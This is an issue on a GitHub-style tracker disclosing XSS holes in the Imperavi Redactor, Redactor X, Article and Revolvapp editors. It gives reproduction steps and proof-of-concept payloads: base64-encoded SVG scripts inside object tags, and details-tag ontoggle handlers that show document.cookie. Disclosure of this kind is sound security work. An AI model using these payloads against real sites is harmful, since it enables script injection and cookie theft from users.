Skip to content

XSS Vulnerability of Redactor  #78

New issue
New issue
Open
Open
XSS Vulnerability of Redactor #78
@HxDDD

Description

@HxDDD
HxDDD
opened on Jun 1, 2022

Impact

  1. XSS in Redactor, Redactor X, Article, Revolvapp

Steps to reproduce

POC

Redactor

  1. access editor page: https://imperavi.com/redactor/
  2. click HTML code and insert XSS script
    script: ><object data="data:image/svg+xml;base64,PHN2ZyB4bWxuczpzdmc9Imh0dHA6Ly93d3cudzMub3JnLzIwMDAvc3ZnIiB4bWxucz0iaHR0cDovL3d3dy53My5vcmcvMjAwMC9zdmciIHhtbG5zOnhsaW5rPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L3hsaW5rIiB2ZXJzaW9uPSIxLjAiIHg9IjAiIHk9IjAiIHdpZHRoPSIxMCIgaGVpZ2h0PSIxMCIgaWQ9InhzcyI+PHNjcmlwdCB0eXBlPSJ0ZXh0L2VjbWFzY3JpcHQiPmFsZXJ0KDQ1KTs8L3NjcmlwdD48L3N2Zz4=">

1

  1. XSS

2

Redactor X, Article

  1. access editor page: https://imperavi.com/redactorx/ and https://imperavi.com/article/
  2. click HTML code and insert XSS script
    script: <object data="data:image/svg+xml;base64,PHN2ZyB4bWxuczpzdmc9Imh0dHA6Ly93d3cudzMub3JnLzIwMDAvc3ZnIiB4bWxucz0iaHR0cDovL3d3dy53My5vcmcvMjAwMC9zdmciIHhtbG5zOnhsaW5rPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L3hsaW5rIiB2ZXJzaW9uPSIxLjAiIHg9IjAiIHk9IjAiIHdpZHRoPSIxMCIgaGVpZ2h0PSIxMCIgaWQ9InhzcyI+PHNjcmlwdCB0eXBlPSJ0ZXh0L2VjbWFzY3JpcHQiPmFsZXJ0KCdYU1MnKTs8L3NjcmlwdD48L3N2Zz4=">

3

  1. XSS

4

Revolvapp

  1. access editor page: https://imperavi.com/revolvapp/
  2. click HTML code and insert XSS script
    script: <details open ontoggle=alert(document.cookie)>xss</details> <dETAILS/open/onToGgle=a=prompt,a(document.cookie) x>

5

  1. XSS

6

Metadata

Metadata

Assignees

No one assigned

    Labels

    No labels
    No labels

    Projects

    No projects

    Milestone

    No milestone

    Relationships

    None yet

    Development

    No branches or pull requests

    Issue actions